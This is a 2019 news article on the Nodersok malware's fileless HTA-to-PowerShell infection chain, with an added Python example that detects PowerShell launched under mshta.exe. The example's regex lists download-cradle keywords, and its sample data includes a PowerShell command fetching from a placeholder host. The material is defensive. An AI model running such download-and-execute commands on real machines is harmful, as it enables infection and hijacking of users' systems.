Malware uses web apps to turn PCs into conduits for attacks

Thousands of systems have been targeted.
Jon Fingas, @jonfingas
September 29, 2019

It's not just botnets that can hijack PCs for nefarious ends. Microsoft and Cisco's Talos researchers have identified a new malware strain, Nodersok (or Divergent), that uses web apps to turn systems into proxies for malicious internet traffic. The attack gets victims to run an HTA (HTML application) file through a rogue ad or download, launching a complex sequence of events. JavaScript in the HTA downloads a separate JavaScript file, and that in turn runs a PowerShell command that downloads and runs a whole host of tools, including ones that disable Windows Defender, ask for more control, capture data packets and create the intended proxy.

Crucially, the infection relies on legitimate programs to accomplish its task, whether they're built into Windows or downloaded from third parties. There are no malware programs copied to storage. The approach makes it harder for security teams to research the code and devise countermeasures.
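Because every stage runs inside a legitimate program, one behavioural check is process lineage: PowerShell running somewhere beneath the HTA host. The sketch below is an added example, not code from Microsoft, Cisco or this article; it assumes HTA files run under mshta.exe (the standard Windows host), and the event field names, sample records and the wscript.exe middle stage are constructed for illustration.

```python
# Added example: flag PowerShell whose process ancestry includes the HTA host.
# Event fields (pid, ppid, image, cmdline) and all sample values are constructed.
import ntpath
import re

HTA_HOST = "mshta.exe"
SHELLS = {"powershell.exe", "pwsh.exe"}
# Generic hints that a PowerShell command line fetches remote content (assumed list).
FETCH_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer", re.I)


def image_name(path):
    """Lower-cased executable name from a Windows path."""
    return ntpath.basename(path).lower()


def ancestors(pid, by_pid):
    """Yield parent events up the tree; `seen` stops loops caused by PID reuse."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid and pid not in seen:
            yield by_pid[pid]


def find_hta_powershell(events):
    """Return (pid, lineage, fetches_remote) for each PowerShell under mshta.exe."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = image_name(e["image"])
        if name not in SHELLS:
            continue
        chain = [image_name(a["image"]) for a in ancestors(e["pid"], by_pid)]
        if HTA_HOST in chain:
            lineage = " > ".join([*reversed(chain), name])
            hits.append((e["pid"], lineage, bool(FETCH_HINTS.search(e["cmdline"]))))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [dict(zip(("pid", "ppid", "image", "cmdline"), row)) for row in [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (210, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\Downloads\update.hta"),
    (220, 210, r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\u\AppData\stage2.js"),
    (230, 220, PS, "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    (300, 100, PS, "powershell.exe Get-ChildItem"),  # benign: no mshta.exe ancestor
]]
```

Run over the constructed records, `find_hta_powershell(SAMPLE_EVENTS)` reports only PID 230, with the full lineage from explorer.exe down to powershell.exe; the PowerShell started directly from explorer.exe is ignored.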

It's not certain who's behind Nodersok. It appears to be meant for everyday criminals rather than hostile countries, however. Cisco believed that it was "primarily designed" for click fraud, or the practice of automatically generating ad clicks to boost revenue from websites. Most targets are typical consumers in Europe and the US rather than corporate or government users.

Both Microsoft and Cisco are keen to tout the ability of their enterprise-grade defense systems to thwart the malware. Most people don't have access to those resources, though, and conventional signature-based antivirus software has a much harder time. Nodersok has targeted "thousands of machines" in recent weeks, according to Microsoft, and that might not let up in the near future.
